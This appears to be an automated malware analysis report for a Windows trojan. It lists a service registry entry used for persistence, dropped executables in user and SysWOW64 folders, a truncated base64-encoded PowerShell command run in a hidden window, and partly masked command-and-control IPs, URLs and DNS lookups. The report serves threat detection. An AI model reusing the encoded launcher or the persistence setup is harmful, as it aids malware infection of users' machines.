Technical Information
- [<HKLM>\System\CurrentControlSet\Services\dxva2] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\dxva2] 'ImagePath' = '"%WINDIR%\SysWOW64\msvcr100d\dxva2.exe"'
- 'dxva2' "%WINDIR%\SysWOW64\msvcr100d\dxva2.exe"
- 'dxva2' %WINDIR%\SysWOW64\msvcr100d\dxva2.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABOAG8AcQBnAHkAagA5AD0AKAAoACcASQB5AHYAJwArACcAcQBiACcAKQArACcAZwB0ACcAKQA7ACYAKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAJwArACcAbQAnACkAIAAkAEUATgBWADoAdQBzAGUAcgBwAFIAbwBmAEkAbABFAFwAZgBpAEcAVABJAE...
- %HOMEPATH%\figticm\o6ajaiz\xr23ll.exe
- %WINDIR%\syswow64\msvcr100d\dxva2.exe
- from %HOMEPATH%\figticm\o6ajaiz\xr23ll.exe to %WINDIR%\syswow64\msvcr100d\dxva2.exe
- '20#.#53.220.157':80
- http://20#.#53.220.157/zhaHY/nPxguL8/
- DNS ASK ca##ri.com
- DNS ASK fu###uggage.com
- '%HOMEPATH%\figticm\o6ajaiz\xr23ll.exe'
- '%WINDIR%\syswow64\msvcr100d\dxva2.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABOAG8AcQBnAHkAagA5AD0AKAAoACcASQB5AHYAJwArACcAcQBiACcAKQArACcAZwB0ACcAKQA7ACYAKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAJwArACcAbQAnACkAIAAkAEUATgBWADoAdQBzAGUAcgBwAFIAbwBmAEkAbABFAFwAZgBpAEcAVABJAE...' (with hidden window)